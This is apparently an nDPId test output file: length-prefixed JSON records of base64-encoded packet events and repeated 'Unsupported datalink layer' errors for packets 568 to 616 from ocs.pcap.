-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":568,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKjQABABoAywKi0ArL40DbC2QBQ64tGkd7vntPQEC8HORsAAAEBCAoANZFyRwYhpwEBBRLe77nv3u\/Ex97vpD\/e77SD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":569,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824623} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":569,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKkQABABoA5wKi0ArL40DbC2QBQ64tGkd7vtIOwEC80WfEAAAEBCAoANZFyRwYhpwEBBQre77nv3u\/Exw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":570,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824688} 
-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":570,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKlQABABoAwwKi0ArL40DbC2QBQ64tGkd7vtIPQEC804iYAAAEBCAoANZF5RwYhpwEBBRLe78oz3u\/Pn97vue\/e78TH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":571,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824693} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":571,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKmQABABoAvwKi0ArL40DbC2QBQ64tGkd7vtIPQEC803LoAAAEBCAoANZF5RwYhpwEBBRLe78oz3u\/VC97vue\/e78TH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":572,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824762} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":572,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKnQABABoA2wKi0ArL40DbC2QBQ64tGkd7vxMewEC9hKMYAAAEBCAoANZGARwYhywEBBQre78oz3u\/VCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":573,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824763} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":573,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKoQABABoA1wKi0ArL40DbC2QBQ64tGkd7vxMewEC9hI1oAAAEBCAoANZGARwYhywEBBQre78oz3u\/adw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":574,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824772} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":574,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKpQABABoA0wKi0ArL40DbC2QBQ64tGkd7vxMewEC9hHe0AAAEBCAoANZGBRwYhywEBBQre78oz3u\/f4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":575,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824834} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":575,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKqQABABoA\/wKi0ArL40DbC2QBQ64tGkd7v3+OAEC+PoJkAAAEBCAoANZGHRwYh3Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":576,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824882} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":576,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKrQABABoAywKi0ArL40DbC2QBQ64tGkd7v3+OwEC+P3JEAAAEBCAoANZGMRwYh3QEBBQre7+VP3u\/quw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":577,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824935} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":577,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKsQABABoA9wKi0ArL40DbC2QBQ64tGkd7v6ruAEC+8lW0AAAEBCAoANZGRRwYh+g=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":578,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824936} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":578,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKtQABABoA8wKi0ArL40DbC2QBQ64tGkd7v8CeAEC\/Wj+cAAAEBCAoANZGRRwYh+g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":579,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824963} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":579,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKuQABABoA7wKi0ArL40DbC2QBQ64tGkd7v9ZOAEC\/qilYAAAEBCAoANZGURwYiCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":580,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824965} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":580,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKvQABABoA6wKi0ArL40DbC2QBQ64tGkd7v+v+AEC\/qhOkAAAEBCAoANZGVRwYiCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":581,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824966} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":581,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKwQABABoA5wKi0ArL40DbC2QBQ64tGkd7wAGuAEC\/Wf5EAAAEBCAoANZGVRwYiCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":582,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825007} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":582,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKxQABABoA4wKi0ArL40DbC2QBQ64tGkd7wBdeAEC\/qegcAAAEBCAoANZGZRwYiDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":583,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825007} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":583,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKyQABABoA3wKi0ArL40DbC2QBQ64tGkd7wC0OAEC\/qdJoAAAEBCAoANZGZRwYiDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":584,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825009} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":584,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKzQABABoA2wKi0ArL40DbC2QBQ64tGkd7wEK+AEC\/Wb0IAAAEBCAoANZGZRwYiDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":585,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825032} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":585,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK0QABABoA1wKi0ArL40DbC2QBQ64tGkd7wFhuAEC\/qabYAAAEBCAoANZGbRwYiGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":586,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825038} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":586,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK1QABABoA0wKi0ArL40DbC2QBQ64tGkd7wG4eAEC\/WZFwAAAEBCAoANZGcRwYiGg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":587,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825041} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":587,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK2QABABoAzwKi0ArL40DbC2QBQ64tGkd7wIPOAEC\/qXtwAAAEBCAoANZGcRwYiGg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":588,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825061} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":588,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK3QABABoAywKi0ArL40DbC2QBQ64tGkd7wJl+AEC\/qWWgAAAEBCAoANZGeRwYiIA=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":589,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825076} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":589,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK4QABABoAxwKi0ArL40DbC2QBQ64tGkd7wK8uAEC\/qU\/kAAAEBCAoANZGgRwYiIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":590,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825076} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":590,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK5QABABoAwwKi0ArL40DbC2QBQ64tGkd7wMTeAEC\/qTo0AAAEBCAoANZGgRwYiIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":591,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825091} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":591,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK6QABABoAvwKi0ArL40DbC2QBQ64tGkd7wNqOAEC\/qSRoAAAEBCAoANZGhRwYiJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":592,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825093} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":592,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK7QABABoAuwKi0ArL40DbC2QBQ64tGkd7wPA+AEC\/qQ64AAAEBCAoANZGhRwYiJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":593,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825105} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":593,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK8QABABoAtwKi0ArL40DbC2QBQ64tGkd7wQXuAEC\/qPjwAAAEBCAoANZGjRwYiKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":594,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825144} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":594,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK9QABABoAswKi0ArL40DbC2QBQ64tGkd7wRueAEC\/qOMwAAAEBCAoANZGnRwYiKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":595,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825183} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":595,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK+QABABoArwKi0ArL40DbC2QBQ64tGkd7wUb+AEC\/qLd8AAAEBCAoANZGqRwYiPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":596,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825188} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":596,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMK\/QABABoAqwKi0ArL40DbC2QBQ64tGkd7wXJeAEC\/qIwUAAAEBCAoANZGrRwYiPg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":597,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825260} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":597,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLAQABABoApwKi0ArL40DbC2QBQ64tGkd7wZ2+AEC\/qGBMAAAEBCAoANZGyRwYiUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":598,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825262} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":598,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLBQABABoAowKi0ArL40DbC2QBQ64tGkd7wckeAEC\/qDTsAAAEBCAoANZGyRwYiUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":599,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825294} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":599,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLCQABABoAnwKi0ArL40DbC2QBQ64tGkd7wd7OAEC\/qB8oAAAEBCAoANZG2RwYiUg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":600,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825360} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":600,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLDQABABoAawKi0ArL40DbC2QBQ64tGkd7wd7OwEC\/qFCAAAAEBCAoANZG8RwYiUgEBBQre8H0f3vCCiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":601,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825363} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":601,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLEQABABoAZwKi0ArL40DbC2QBQ64tGkd7wd7OwEC\/qDrQAAAEBCAoANZG8RwYiUgEBBQre8H0f3vCH9w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":602,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825365} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":602,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLFQABABoAYwKi0ArL40DbC2QBQ64tGkd7wd7OwEC\/qCUcAAAEBCAoANZG9RwYiUgEBBQre8H0f3vCNYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":603,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825449} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":603,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLGQABABoAXwKi0ArL40DbC2QBQ64tGkd7wd7OwEC\/qA9MAAAEBCAoANZHFRwYiUgEBBQre8H0f3vCSzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":604,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825450} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":604,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLHQABABoAiwKi0ArL40DbC2QBQ64tGkd7wks+AEC+s7LsAAAEBCAoANZHFRwYicw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":605,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825845} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":605,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLIQABABoAhwKi0ArL40DbC2QBQ64tGkd7wmDuAEC\/q5owAAAEBCAoANZHtRwYi0A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":606,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825912} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":606,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLJQABABoAUwKi0ArL40DbC2QBQ64tGkd7wmDuwEC\/qpvoAAAEBCAoANZHzRwYi0AEBBQre8KMT3vCofw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":607,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825913} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLKQABABoATwKi0ArL40DbC2QBQ64tGkd7wmDuwEC\/qoY4AAAEBCAoANZHzRwYi0AEBBQre8KMT3vCt6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":608,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825961} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":608,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLLQABABoASwKi0ArL40DbC2QBQ64tGkd7wnaewEC\/WnAUAAAEBCAoANZH4RwYi\/AEBBQre8KMT3vCt6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":609,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825962} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":609,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLMQABABoAdwKi0ArL40DbC2QBQ64tGkd7wreuAEC\/B0M4AAAEBCAoANZH4RwYi\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":610,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825963} 
-00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":610,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLNQABABoAQwKi0ArL40DbC2QBQ64tGkd7wreuwEC\/BhmoAAAEBCAoANZH4RwYi\/AEBBQre8Kh\/3vCt6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":611,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825966} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":611,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLOQABABoAbwKi0ArL40DbC2QBQ64tGkd7ws1eAEC+sy3YAAAEBCAoANZH5RwYi\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":612,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826011} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":612,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLPQABABoAawKi0ArL40DbC2QBQ64tGkd7wuMOAEC\/qxbwAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":613,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826012} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":613,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLQQABABoAZwKi0ArL40DbC2QBQ64tGkd7wvi+AEC\/qwFAAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":614,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826014} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":614,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLRQABABoAYwKi0ArL40DbC2QBQ64tGkd7ww5uAEC\/WuvgAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":615,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826018} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":615,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLSQABABoAXwKi0ArL40DbC2QBQ64tGkd7wyQeAEC\/qtXYAAAEBCAoANZH+RwYjCQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":616,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826071} 